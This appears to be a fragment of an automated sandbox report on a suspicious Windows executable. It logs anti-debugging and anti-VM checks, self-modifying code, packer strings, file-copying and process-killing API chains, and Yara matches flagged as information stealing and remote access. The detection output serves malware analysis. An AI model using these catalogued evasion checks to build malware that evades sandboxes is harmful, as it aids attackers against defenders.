Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140E77D second address: 140E781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140E781 second address: 140E785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140E785 second address: 140E790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140EA62 second address: 140EA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140EA66 second address: 140EA86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F0F04CBD318h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140EA86 second address: 140EA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F0527E40Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140ECEF second address: 140ECF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F027 second address: 140F03C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0F0527E406h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F0F0527E406h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F03C second address: 140F04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0F04CBD316h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F04B second address: 140F068 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F0527E413h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F312 second address: 140F320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136DF27 second address: 136DF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F0527E416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136DF43 second address: 136DF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136DF47 second address: 136DF4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141942E second address: 1419434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419434 second address: 141943E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0F0527E406h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419721 second address: 1419740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F0F04CBD316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jng 00007F0F04CBD328h 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419883 second address: 141988D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141988D second address: 1419893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419893 second address: 14198A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F0527E406h 0x0000000a jne 00007F0F0527E406h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419BC7 second address: 1419BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419D1A second address: 1419D25 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419FDD second address: 1419FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419FE3 second address: 141A001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007F0F0527E406h 0x0000000e jmp 00007F0F0527E40Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1420A1D second address: 1420A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F04CBD316h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1420A29 second address: 1420A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1420A2E second address: 1420A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0F04CBD316h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141F870 second address: 141F875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141F875 second address: 141F891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F0F04CBD31Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141F891 second address: 141F8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F0527E406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141F8A2 second address: 141F8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F04CBD31Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141F8BB second address: 141F8E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E414h 0x00000007 jmp 00007F0F0527E413h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142A2A6 second address: 142A2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14371F9 second address: 14371FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14371FD second address: 143720D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F0F04CBD316h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 143720D second address: 1437216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1437216 second address: 143723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F04CBD316h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F0F04CBD31Eh 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a jns 00007F0F04CBD316h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 143723F second address: 143724A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144192B second address: 144192F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144192F second address: 144193D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0F0527E40Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144193D second address: 1441941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1449178 second address: 144917F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1452A35 second address: 1452A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F0F04CBD316h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F04CBD321h 0x00000014 jno 00007F0F04CBD316h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1452A5B second address: 1452A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0F0527E406h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1452A7E second address: 1452A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1451232 second address: 145123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1451404 second address: 1451420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F04CBD31Ch 0x0000000d jnl 00007F0F04CBD318h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14517DA second address: 14517E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14517E3 second address: 14517FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14517FE second address: 1451804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 11FDADF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 11FDB9B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13B7DEF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 142BACD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00F240F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00F1E530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00F247C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F1F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F11710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F1DB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F24B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00F23B00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F1BE40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00F1EE20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F1DF10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F11160 GetSystemInfo,ExitProcess, 0_2_00F11160
Source: file.exe, file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1731587725.0000000001DB2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731587725.0000000001DE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware2,
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F14610 VirtualProtect ?,00000004,00000100,00000000 0_2_00F14610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00F29BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F29AA0 mov eax, dword ptr fs:[00000030h] 0_2_00F29AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F27690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA, 0_2_00F27690
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00F29790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle, 0_2_00F298E0
Source: file.exe, file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F575A8 cpuid 0_2_00F575A8
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00F27D20
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F26BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00F26BC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00F279E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F27BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00F27BC0

Stealing of Sensitive Information

Source: Yara match File source: 0.2.file.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: 0.2.file.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP